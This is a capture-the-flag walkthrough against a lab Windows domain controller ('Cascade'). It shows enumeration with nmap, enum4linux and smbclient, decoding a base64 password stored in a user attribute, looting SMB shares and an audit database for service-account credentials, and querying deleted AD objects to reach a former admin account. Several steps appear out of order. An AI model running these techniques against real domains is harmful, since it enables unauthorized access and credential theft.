```
$ sudo nmap -p- -sSVC -oA nmap_services 10.10.10.182
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 21:59 CEST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 25.28% done; ETC: 22:02 (0:01:52 remaining)
Nmap scan report for 10.10.10.182
Host is up (0.022s latency).
Not shown: 65520 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-19 20:05:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 342.64 seconds
```
The Windows machine is using SMBv2, so many tools that only work with SMBv1 will
be ineffective.
For example, enum4linux is able to find information about users but fails for
everything else.
```
$ enum4linux -a 10.10.10.182
...
=============================
|    Users on 10.10.10.182    |
=============================
index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull   Name: Adrian Turnbull   Desc: (null)
index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc       Name: ArkSvc            Desc: (null)
index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson     Name: Ben Hanson        Desc: (null)
index: 0xee7 RID: 0x46a acb: 0x00000210 Account: BackupSvc    Name: BackupSvc         Desc: (null)
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest    Name: (null)            Desc: Built-in account for guest access to the computer/domain
index: 0xee5 RID: 0x469 acb: 0x00000210 Account: d.burman     Name: David Burman      Desc: (null)
index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe      Name: Edward Crowe      Desc: (null)
index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft      Name: Ian Croft         Desc: (null)
index: 0xeeb RID: 0x46e acb: 0x00000210 Account: j.allen      Name: Joseph Allen      Desc: (null)
index: 0xede RID: 0x462 acb: 0x00000210 Account: j.goodhand   Name: John Goodhand     Desc: (null)
index: 0xed7 RID: 0x45c acb: 0x00000210 Account: j.wakefield  Name: James Wakefield   Desc: (null)
index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson   Name: Ryan Thompson     Desc: (null)
index: 0xedd RID: 0x461 acb: 0x00000210 Account: s.hickson    Name: Stephanie Hickson Desc: (null)
index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith      Name: Steve Smith       Desc: (null)
index: 0xed2 RID: 0x457 acb: 0x00000210 Account: util         Name: Util              Desc: (null)
...

[+] Getting local group memberships:
Group 'AD Recycle Bin' (RID: 1119) has member: CASCADE\arksvc
Group 'Remote Management Users' (RID: 1126) has member: CASCADE\arksvc
Group 'Remote Management Users' (RID: 1126) has member: CASCADE\s.smith
Group 'HR' (RID: 1115) has member: CASCADE\s.hickson
Group 'IT' (RID: 1113) has member: CASCADE\arksvc
Group 'IT' (RID: 1113) has member: CASCADE\s.smith
Group 'IT' (RID: 1113) has member: CASCADE\r.thompson
Group 'Audit Share' (RID: 1137) has member: CASCADE\s.smith
Group 'Data Share' (RID: 1138) has member: CASCADE\Domain Users
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\krbtgt
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Schema Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Enterprise Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Cert Publishers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Group Policy Creator Owners
Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Read-only Domain Controllers
...

[+] Getting domain group memberships:
Group 'Domain Users' (RID: 513) has member: CASCADE\administrator
Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt
Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc
Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith
Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson
Group 'Domain Users' (RID: 513) has member: CASCADE\util
Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield
Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson
Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand
Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull
Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe
Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson
Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman
Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc
Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen
Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft
Group 'Group Policy Creator Owners' (RID: 520) has member: CASCADE\administrator
Group 'Domain Guests' (RID: 514) has member: CASCADE\CascGuest
...
```
- arksvc is in a weird group, AD Recycle Bin, which may be useful later.
- arksvc and s.smith are in Remote Management Users, so they will be able to
  connect over RDP.

Then we have organisational information:

- s.hickson is in the HR group.
- arksvc, s.smith and r.thompson are in the IT group.
- s.smith is in the Audit Share group, so he will probably have permissions
  on some network shares.
- All Domain Users are in the Data Share group.
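The acb column of the user listing above encodes the SAMR account-control bits, which say more about an account than its group memberships do. As an added example (not from the original writeup), this Python decodes those bits and lists the enabled accounts an administrator should review, for instance a.turnbull's 0x214 (no password required and password never expires); the sample lines are constructed from the listing above.

```python
import re

# SAMR account-control (acb) bits as printed by enum4linux/rpcclient (MS-SAMR 2.2.1.12).
ACB_FLAGS = {
    0x0001: "DISABLED",
    0x0002: "HOMDIRREQ",
    0x0004: "PWNOTREQ",   # no password required
    0x0008: "TEMPDUP",
    0x0010: "NORMAL",
    0x0020: "MNS",
    0x0040: "DOMTRUST",
    0x0080: "WSTRUST",
    0x0100: "SVRTRUST",
    0x0200: "PWNOEXP",    # password never expires
    0x0400: "AUTOLOCK",
}
REVIEW = ("PWNOTREQ", "PWNOEXP")

USER_RE = re.compile(r"RID: 0x(?P<rid>[0-9a-f]+) acb: 0x(?P<acb>[0-9a-f]+) "
                     r"Account: (?P<account>\S+)\s+Name: (?P<name>.+?)\s+Desc: (?P<desc>.+)$")

# Constructed sample in the shape of the enum4linux user listing above.
SAMPLE = """\
index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull Name: Adrian Turnbull Desc: (null)
index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc Name: ArkSvc Desc: (null)
index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson Name: Ben Hanson Desc: (null)
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson Name: Ryan Thompson Desc: (null)
"""

def decode_acb(acb):
    """Return the flag names set in an acb value, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]

def parse_users(output):
    """Parse the 'index: ... RID: ... acb: ...' lines into dicts."""
    users = []
    for line in output.splitlines():
        m = USER_RE.search(line)
        if m:
            users.append({"rid": int(m["rid"], 16), "acb": int(m["acb"], 16),
                          "account": m["account"], "name": m["name"], "desc": m["desc"]})
    return users

def audit(output):
    """Enabled accounts whose acb carries bits worth reviewing (no password / non-expiring password)."""
    findings = {}
    for u in parse_users(output):
        flags = decode_acb(u["acb"])
        hits = [f for f in flags if f in REVIEW]
        if hits and "DISABLED" not in flags:
            findings[u["account"]] = hits
    return findings
```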
Anyway, enum4linux is just a poorly written wrapper around various more specific
tools such as rpcclient, so we can use rpcclient directly.
I already knew from enum4linux that s.smith is in the Audit Share group, but
now we know he can execute scriptPath: MapAuditDrive.vbs.
User r.thompson has a weird custom property, cascadeLegacyPwd: clk0bjVldmE=,
that looks like a base64-encoded password:

```
$ printf %s 'clk0bjVldmE=' | base64 -d
rY4n5eva
```
There is also another attribute, msDS-SupportedEncryptionTypes: 0.
By default this machine uses msDS-SupportedEncryptionTypes: 31, so accounts
will use one of these algorithms: "DES_CRC", "DES_MD5", "RC4", "AES128", "AES256".
But type 0 doesn't exist, so it's maybe a hint that no encryption is used.
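As an added example (not part of the original writeup), this Python decodes the msDS-SupportedEncryptionTypes bitmask discussed above and gives each account an audit verdict; the sample account values other than r.thompson's are constructed, and the treatment of 0 as "not set" is documented KDC behaviour rather than something stated on this page.

```python
# Bit flags of msDS-SupportedEncryptionTypes (MS-KILE 2.2.7); names as listed above.
ENC_TYPES = {
    0x01: "DES_CRC",
    0x02: "DES_MD5",
    0x04: "RC4",
    0x08: "AES128",
    0x10: "AES256",
}
WEAK = {"DES_CRC", "DES_MD5", "RC4"}

def decode_enc_types(value):
    """Flag names set in the attribute value, lowest bit first (31 -> all five)."""
    return [name for bit, name in sorted(ENC_TYPES.items()) if value & bit]

def classify(value):
    """Summarise what the account advertises to the KDC."""
    types = set(decode_enc_types(value))
    if not types:
        # 0 (or an absent attribute) means "not set": the KDC falls back to its
        # default policy for the account instead of reading it as "no encryption".
        return "default"
    if types <= WEAK:
        return "weak-only"
    if types & WEAK:
        return "mixed"
    return "aes-only"

def audit_enc_types(accounts):
    """accounts: {sAMAccountName: msDS-SupportedEncryptionTypes}; returns a per-account verdict."""
    return {name: {"types": decode_enc_types(v), "verdict": classify(v)}
            for name, v in accounts.items()}

# Constructed sample: r.thompson's value from the page plus hypothetical accounts.
SAMPLE_ACCOUNTS = {"r.thompson": 0, "svc-legacy": 0x04, "svc-modern": 0x18, "dc-default": 31}
```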
The credentials are valid, so we can enumerate the shares with smbclient:

```
$ smbclient -U 'r.thompson' -L '\\10.10.10.182\'
Enter WORKGROUP\r.thompson's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Audit$          Disk
	C$              Disk      Default share
	Data            Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```
Let's try to see what is located in non-default shares:
```
$ smbclient -U 'r.thompson' '\\10.10.10.182\Data\'
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 27 04:27:34 2020
  ..                                  D        0  Mon Jan 27 04:27:34 2020
  Contractors                         D        0  Mon Jan 13 02:45:11 2020
  Finance                             D        0  Mon Jan 13 02:45:06 2020
  IT                                  D        0  Tue Jan 28 19:04:51 2020
  Production                          D        0  Mon Jan 13 02:45:18 2020
  Temps                               D        0  Mon Jan 13 02:45:15 2020

		13106687 blocks of size 4096. 7797252 blocks available
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (30,4 KiloBytes/sec) (average 30,4 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (14,6 KiloBytes/sec) (average 22,2 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (11,8 KiloBytes/sec) (average 14,5 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (33,1 KiloBytes/sec) (average 16,5 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
```
The meeting notes (Meeting_Notes_June_2018.html) contain:

```
From:     Steve Smith
To:       IT (Internal)
Sent:     14 June 2018 14:07
Subject:  Meeting Notes

For anyone that missed yesterday's meeting (I'm looking at you Ben). Main points are below:

-- New production network will be going live on Wednesday so keep an eye out for any issues.
-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).
-- The winner of the “Best GPO” competition will be announced on Friday so get your submissions in soon.

Steve
```
So there is a TempAdmin account, with the same password as the admin account, used
as a temporary account to perform all tasks related to the network migration.
Another interesting file is IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log;
remember that the ArkSvc account is in the AD Recycle Bin group.
```
1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0
8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0
```
This group gives you permission to read deleted AD objects. Some juicy information can be found in there:

```powershell
# This isn't a PowerView command, it's a feature of Microsoft's Active Directory PowerShell module
# You need to be in the "AD Recycle Bin" group of the AD to list the deleted AD objects
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -Properties *
```
So TempAdmin and ArkSvc will definitely be helpful for the EoP.
In a registry script we can find a VNC password, probably for the s.smith user.
UltraVNC stores it in C:\Program Files\UltraVNC\ultravnc.ini, in the value passwd or passwd2.
To have Metasploit loaded in an irb session, the easiest way is to launch msfconsole
and use the internal msf irb command:

```
$ msfconsole -q
msf5 > irb
```
However, for ArchLinux users there was a bug
(FS#66480) preventing irb from being
loaded from msfconsole, but I fixed it upstream.
For those still experiencing this bug in some distro, a workaround is:

```
$ msfconsole -q
msf5 > irb -e '$LOAD_PATH << "/usr/lib/ruby/gems/2.7.0/gems/irb-1.2.1/lib/"'
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>>
```
In both cases we can launch the Rex module and decrypt the password:
```
$ smbclient -U 'r.thompson' '\\10.10.10.182\NETLOGON\'
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 15 22:50:33 2020
  ..                                  D        0  Wed Jan 15 22:50:33 2020
  MapAuditDrive.vbs                   A      258  Wed Jan 15 22:50:15 2020
  MapDataDrive.vbs                    A      255  Wed Jan 15 22:51:03 2020

		13106687 blocks of size 4096. 7796708 blocks available
smb: \> prompt OFF
smb: \> mget *
getting file \MapAuditDrive.vbs of size 258 as MapAuditDrive.vbs (2,9 KiloBytes/sec) (average 2,9 KiloBytes/sec)
getting file \MapDataDrive.vbs of size 255 as MapDataDrive.vbs (3,2 KiloBytes/sec) (average 3,0 KiloBytes/sec)
```
PS: Audit$ is not readable by r.thompson.
```vbscript
'MapAuditDrive.vbs
Option Explicit
Dim oNetwork, strDriveLetter, strRemotePath
strDriveLetter = "F:"
strRemotePath = "\\CASC-DC1\Audit$"
Set oNetwork = CreateObject("WScript.Network")
oNetwork.MapNetworkDrive strDriveLetter, strRemotePath
WScript.Quit
```

```vbscript
'MapDataDrive.vbs
Option Explicit
Dim oNetwork, strDriveLetter, strRemotePath
strDriveLetter = "O:"
strRemotePath = "\\CASC-DC1\Data"
Set oNetwork = CreateObject("WScript.Network")
oNetwork.MapNetworkDrive strDriveLetter, strRemotePath
WScript.Quit
```
SYSVOL is often a great place to find passwords of service accounts used in
install scripts:
```
$ smbclient -U 's.smith' '\\10.10.10.182\Audit$\'
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 19:01:26 2020
  ..                                  D        0  Wed Jan 29 19:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 22:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 19:00:20 2020
  DB                                  D        0  Tue Jan 28 22:40:59 2020
  RunAudit.bat                        A       45  Wed Jan 29 00:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 07:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 07:38:38 2019
  x64                                 D        0  Sun Jan 26 23:25:27 2020
  x86                                 D        0  Sun Jan 26 23:25:27 2020

		13106687 blocks of size 4096. 7795108 blocks available
smb: \> mget RunAudit.bat
Get file RunAudit.bat? y
getting file \RunAudit.bat of size 45 as RunAudit.bat (0,5 KiloBytes/sec) (average 0,5 KiloBytes/sec)
smb: \> prompt OFF
smb: \> cd DB
smb: \DB\> ls
  .                                   D        0  Tue Jan 28 22:40:59 2020
  ..                                  D        0  Tue Jan 28 22:40:59 2020
  Audit.db                            A    24576  Tue Jan 28 22:39:24 2020

		13106687 blocks of size 4096. 7795366 blocks available
smb: \DB\> mget Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (150,0 KiloBytes/sec) (average 99,4 KiloBytes/sec)
smb: \DB\>
```
RunAudit.bat (see below) gives the idea to check the DB if we missed it.
There is a DeletedUserAudit table containing the names of the removed users we
saw earlier in \\CASC-DC1\Data\IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log.
But more interesting, there is a Ldap table with only one entry:
| Id | uname  | pwd                      | domain        |
|----|--------|--------------------------|---------------|
| 1  | ArkSvc | BQO5l5Kj9MdErXx6Q6AGOw== | cascade.local |
So we got the password of ArkSvc, but it's neither plain base64 nor the SSHA or MD5
LDAP format. I just pasted BQO5l5Kj9MdErXx6Q6AGOw== into a search engine and
found a C# script decrypting the AES-encrypted value.
The Active Directory Recycle Bin was introduced in the Windows Server 2008 R2 release. The goal of this feature was to facilitate the recovery of deleted Active Directory objects without requiring restoration of backups, restarting Active Directory Domain Services, or rebooting domain controllers. To accomplish these goals, the AD Recycle Bin introduced changes to the behavior of the Active Directory object deletion lifecycle.
And the target is running exactly Windows Server 2008 R2, so that matches perfectly.
Continue reading:
On to the AD Recycle Bin object recovery process. While providing considerably more value, the AD Recycle Bin was initially hampered by the fact that it was relatively difficult to use. Prior to Windows Server 2012, viewing the contents of the Recycle Bin required the use of an LDAP tool or PowerShell. For example, this PowerShell query will return all of the deleted objects within a domain:
```powershell
Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects
```

```
Deleted           : True
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
Name              : User
                    DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
ObjectClass       : container
ObjectGUID        : 746385f2-e3a0-4252-b83a-5a206da0ed88

Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name              : TempAdmin
                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059
```
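As an added example (not from the original writeup), this Python reconciles the ArkAdRecycleBin.log entries shown earlier with the Get-ADObject listing above: it pulls the run-as user and the tombstone GUID out of each "Successfully moved object" line, checks whether that GUID is still in the Deleted Objects container, and flags admin-looking names, which is the check a defender would run on such a log. Both samples are constructed from lines shown on this page.

```python
import re

RUNAS_RE = re.compile(r"Running as user (?P<user>\S+)$")
MOVED_RE = re.compile(r"^(?P<ts>\S+ \d\d:\d\d)\s+\[MAIN_THREAD\]\s+Successfully moved object\. "
                      r"New location (?P<dn>CN=.+)$")
# Tombstoned DNs look like CN=<name>\0ADEL:<objectGUID>,CN=Deleted Objects,...
TOMBSTONE_RE = re.compile(r"^CN=(?P<cn>.+?)\\0ADEL:(?P<guid>[0-9a-f-]{36}),")

# Constructed samples in the format of the log and of the Get-ADObject output.
LOG_SAMPLE = r"""2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
"""
AD_SAMPLE = r"""Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059
"""

def parse_recycle_log(text):
    """One record per object the Ark tool moved to the recycle bin, with the run-as user."""
    records, user = [], None
    for line in text.splitlines():
        if (m := RUNAS_RE.search(line)):
            user = m["user"]
        elif (m := MOVED_RE.match(line)) and (t := TOMBSTONE_RE.match(m["dn"])):
            records.append({"when": m["ts"], "by": user, "cn": t["cn"], "guid": t["guid"]})
    return records

def parse_deleted_objects(text):
    """Map ObjectGUID -> ObjectClass from Get-ADObject -IncludeDeletedObjects list output."""
    guids, cls = {}, None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "ObjectClass":
            cls = value
        elif key == "ObjectGUID":
            guids[value] = cls
    return guids

def reconcile(log_text, ad_text):
    """Join log entries with the live Deleted Objects container and flag admin-looking names."""
    tombstones = parse_deleted_objects(ad_text)
    out = []
    for rec in parse_recycle_log(log_text):
        rec["in_recycle_bin"] = rec["guid"] in tombstones
        rec["object_class"] = tombstones.get(rec["guid"])
        rec["admin_like"] = "admin" in rec["cn"].lower()
        out.append(rec)
    return out
```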
With a command given in the article I tried to restore the TempAdmin account:
```
$ *Evil-WinRM* PS C:\Users\arksvc\Documents> Restore-ADObject -Identity 'f0cc344d-31e0-4866-bceb-a842791ca059'
Insufficient access rights to perform the operation
At line:1 char:1
+ Restore-ADObject -Identity 'f0cc344d-31e0-4866-bceb-a842791ca059'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject
```
But it seems we are denied even though ArkSvc is in the right group.
The Identity parameter specifies the Active Directory object to restore. You can identify an object by its distinguished name (DN) or GUID. You can also set the Identity parameter to an object variable such as $, or you can pass an object through the pipeline to the Identity parameter. For example, you can use the Get-ADObject cmdlet to retrieve a deleted object by specifying the IncludeDeletedObjects parameter. You can then pass the object through the pipeline to the Restore-ADObject cmdlet.
Note: You can get the distinguished names of deleted objects by using the Get-ADObject cmdlet with the -IncludeDeletedObjects parameter specified.